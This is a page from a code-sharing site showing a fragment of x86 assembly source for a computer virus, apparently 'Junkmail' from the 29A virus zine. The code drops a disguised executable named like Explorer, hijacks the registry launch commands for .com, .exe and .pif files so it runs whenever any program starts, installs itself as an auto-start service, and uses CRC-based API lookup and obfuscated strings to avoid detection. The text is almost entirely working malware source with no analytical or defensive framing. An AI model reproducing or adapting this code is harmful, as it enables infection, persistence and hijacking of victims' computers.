📄 29a-7.005
字号:
; mz 03mz 03mz 03mz 03r 04
db 1, 1, 1, 1
dd 10001110101001100101001111001111b
; mz 07r 04mmz 0ar 0er 0e
db 2, 8, 10h
dd 00010110000111000010100001101100b
; z 05mz 03mz 02mz 03r 08
db 10h, ((junkmail_codeend - offset junkmail_inf + expsize + 80h + 1ffh) and not 1ffh) shr 8, 1
dd 00011110000000000000000000000000b
; z 07m
db 0e0h
dd 0
;decompressed data follow. 'X' bytes are set to random value every time
; db 'M', 'Z' ;00
; db "gdi32.dll", 0 ;02 align 4, filler (overload for dll name and import lookup table RVA)
; db 'P', 'E', 0, 0 ;0c 00 signature (overload for date/time stamp)
; dw 14ch ;10 04 machine (overload for forwarder chain)
; dw 1 ;12 06 number of sections (overload for forwarder chain)
; dd 2 ;14 08 date/time stamp (overload for dll name RVA)
; dd 102ch ;18 0c pointer to symbol table (overload for import address table RVA)
; db X, X, X, X ;1c 10 number of symbols
; dw 88h ;20 14 size of optional header
; dw 30fh ;22 16 characteristics
; dw 10bh ;24 18 magic
; db X ;26 1a major linker
; db X ;27 1b minor linker
; dd 0 ;28 1c size of code (overload for import table terminator)
; dd 56h ;2c 20 size of init data (overload for import name table RVA)
; dd 0 ;30 24 size of uninit data (overload for import name table terminator)
; dd offset junkmail_exe - offset junkmail_inf + expsize + 1000h
; ;34 28 entry point
; db X, X, X, X ;38 2c base of code
; dd 0ch ;3c 30 base of data (overload for lfanew)
; dd 400000h ;40 34 image base
; dd 1000h ;44 38 section align
; dd 200h ;48 3c file align
; db 1, X ;4c 40 major os
; db X, X ;4e 42 minor os
; db X, X ;50 44 major image
; db X, X ;52 46 minor image
; dw 4 ;54 48 major subsys
; dw 0 ;56 4a minor subsys (overload for import name table)
; db "Arc", 0 ;58 4c reserved (overload for import name table)
; dd (aligned size of code) ;5c 50 size of image
; dd expsize ;60 54 size of headers
; dd 0 ;64 58 checksum
; dw 2 ;68 5c subsystem
; db X, X ;6a 5e dll characteristics
; dd 1 ;6c 60 size of stack reserve
; dd 1 ;70 64 size of stack commit
; dd 1 ;74 68 size of heap reserve
; dd 1 ;78 6c size of heap commit
; db X, X, X, X ;7c 70 loader flags
; dd 2 ;80 74 number of rva and sizes (ignored by Windows 9x/Me)
; dd 0 ;84 78 export
; db X, X, X, X ;88 7c export
; dd 1008h ;8c 80 import
; dd 0 ;90 84 import
; dd 0 ;94 88 resource
; db X, X, X, X ;98 8c resource
; db X, X, X, X, X, X, X, X ;9c 90 exception
; db X, X, X, X, X, X, X, X ;a4 98 certificate
; db X, X, X, X, X, X, X, X ;ac a0 base reloc (overload for section name)
; dd 0 ;b4 a8 debug (overload for virtual size)
; dd 1000h ;b8 ac debug (overload for virtual address)
; dd (aligned size of code) ;bc b0 architecture (overload for file size)
; dd 1 ;c0 b4 architecture (overload for file offset)
; db X, X, X, X ;c4 b8 global data (overload for pointer to relocs)
; db X, X, X, X ;c8 bc global data (overload for pointer to line numbers)
; dd 0 ;cc c0 tls (overload for reloc table and line numbers)
; dd 0e0000000h ;d0 c4 tls (overload for section characteristics)
; ;d4
copy_exp label near
mov cx, offset mail_recip - offset junkmail_inf
sub esi, offset copy_exp - offset junkmail_inf
rep movs byte ptr [edi], byte ptr [esi]
mov al, "'"
stos byte ptr [edi]
pop ebx
push ebp
call dword ptr [ebx + expcrcstk.pWriteFile]
push ebp
call dword ptr [ebx + expcrcstk.pCloseHandle]
pop eax
push eax
inc ebp
je load_regdll ;allow only 1 copy to run
push 0
push eax
call dword ptr [ebx + expcrcstk.pWinExec]
load_regdll label near
sub esi, offset mail_recip - offset regdll
push esi
call dword ptr [ebx + expcrcstk.pLoadLibraryA]
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
regcrcbegin label near ;place < 80h bytes from call for smaller code
dd (regcrc_count + 1) dup (0)
regcrcend label near
dd offset reg_file - offset regcrcend + 4
regval db 'ExpIorer "%1" %*', 0
regkey db "\com" ;no regedit.com ;)
db "\exe" ;must be 4 bytes long
db "\pif" ;hook all executable suffix (except .scr which passes /S)
reg_file label near ;must follow immediately
mov ebx, esp
mov ecx, HKEY_LOCAL_MACHINE ;can obfuscate and same size if push 5+pop ecx+ror ecx, 1
;-----------------------------------------------------------------------------
;alter Software\Classes in Local Machine and Current User
;because in Windows 2000/XP, Current User values override Local Machine values
;-----------------------------------------------------------------------------
reg_loopouter label near
lea ebp, dword ptr [edi + offset regval - offset reg_file]
sub edi, offset reg_file - offset regkey
push (offset reg_file - offset regkey) shr 2
pop esi
reg_loopinner label near
push ecx
push "dna"
push "mmoc"
push "\nep"
push "o\ll"
push "ehs\"
push "elif"
push dword ptr [edi] ;comfile, exefile, piffile
push "sess"
push "alc\"
push "eraw"
push "tfos" ;obfuscated ;)
mov eax, esp
push offset regkey - offset regval
push ebp
push REG_SZ
push eax
push ecx
call dword ptr [ebx + regcrcstk.rRegSetValueA]
;RegSetValue creates keys
add esp, 2ch ;size software\classes\???file\shell\open\command
scas dword ptr [edi]
pop ecx
dec esi
jne reg_loopinner
loopw reg_loopouter ;decrements CX only
;-----------------------------------------------------------------------------
;register as service if NT/2000/XP (recognised but ignored by 9x/Me)
;no start service because code is running already
;-----------------------------------------------------------------------------
push SC_MANAGER_CREATE_SERVICE
push esi
push esi
call dword ptr [ebx + regcrcstk.rOpenSCManagerA]
mov ecx, dword ptr [ebx + size regcrcstk]
push ecx
push eax
push esi
push esi
push esi
push esi
push esi
push ecx
push esi ;SERVICE_ERROR_IGNORE
push SERVICE_AUTO_START
push SERVICE_WIN32_OWN_PROCESS
push esi
sub edi, offset reg_file - offset dispname
push edi
add edi, offset explabel - offset dispname
push edi
push eax
call dword ptr [ebx + regcrcstk.rCreateServiceA]
push eax
call dword ptr [ebx + regcrcstk.rCloseServiceHandle]
call dword ptr [ebx + regcrcstk.rCloseServiceHandle]
call dword ptr [ebx + 4 + size regcrcstk + expcrcstk.pGlobalFree]
popad
host_patch label near
db 0e9h, 'rgb!'
;-----------------------------------------------------------------------------
;virus code begins here in dropped exe
;-----------------------------------------------------------------------------
junkmail_exe label near
call walk_seh
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
execrcbegin label near ;place < 80h bytes from call for smaller code
dd (execrc_count + 1) dup (0)
execrcend label near
dd offset load_user32 - offset execrcend + 4
load_user32 label near
call skip_user32
db "user32", 0
skip_user32 label near
call dword ptr [esp + execrcstk.eLoadLibraryA + 4]
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
usrcrcbegin label near ;place < 80h bytes from call for smaller code
dd (usrcrc_count + 1) dup (0)
usrcrcend label near
dd offset get_cmdline - offset usrcrcend + 4
;-----------------------------------------------------------------------------
;determine platform and dynamically select function types (ANSI or Unicode)
;-----------------------------------------------------------------------------
get_cmdline label near
mov ebx, esp
call dword ptr [ebx + size usrcrcstk + execrcstk.eGetVersion]
shr eax, 1fh
lea esi, dword ptr [eax * 4 + ebx]
;-----------------------------------------------------------------------------
;RegisterServiceProcess() if 9x/Me (just sets one bit)
;-----------------------------------------------------------------------------
mov ecx, dword ptr fs:[tib.TibTeb]
or byte ptr [ecx + teb.procflags + 1], al
;-----------------------------------------------------------------------------
;parse command-line in platform-independent way to see how file was run
;-----------------------------------------------------------------------------
dec ax
mov al, 0ffh
xchg edi, eax ;ffff if Unicode, 00ff if ANSI
mov eax, dword ptr [esi + usrcrcstk.uCharNextW]
mov dword ptr ds:[offset store_charnext - offset junkmail_inf + expsize + 401001h], eax
call dword ptr [esi + size usrcrcstk + execrcstk.eGetCommandLineW]
stack_delta label near
mov ebp, dword ptr [eax]
and ebp, edi
cmp ebp, '"' ;Unicode-compatible compare
je skip_argv0
push ' '
pop ebp
skip_argv0 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW]
mov ecx, dword ptr [eax]
and ecx, edi
je argv1_skip
cmp ecx, ebp
jne skip_argv0
find_argv1 label near
push eax
call dword ptr [esi + usrcrcstk.uCharNextW]
mov ecx, dword ptr [eax]
and ecx, edi
cmp ecx, ' ' ;Unicode-compatible compare
je find_argv1
argv1_skip label near
;-----------------------------------------------------------------------------
;if argv1 exists then argv0 was run using shell\open\command so run argv1
;-----------------------------------------------------------------------------
jecxz stack_copy
sub esp, size processinfo
mov edx, esp
sub esp, size startupinfo
mov ecx, esp
push edx
push ecx
xor edx, edx
push edx
push edx
push edx
push edx
push edx
push edx
push eax
push edx
push ecx
call dword ptr [esi + size usrcrcstk + execrcstk.eGetStartupInfoW]
call dword ptr [esi + size usrcrcstk + execrcstk.eCreateProcessW]
call dword ptr [ebx + size usrcrcstk + execrcstk.eExitProcess]
;-----------------------------------------------------------------------------
;allocate stack space for RNG cache
;-----------------------------------------------------------------------------
stack_copy label near
mov ebx, dword ptr [ebx + size usrcrcstk.execrcstk.eGetTickCount]
call ebx ;RNG seed
enter (statelen + 1) shl 2, 0 ;RNG cache
mov edi, esp
call randinit
mov edi, ebx
call find_mzhdr
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
krncrcbegin label near ;place < 80h bytes from call for smaller code
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -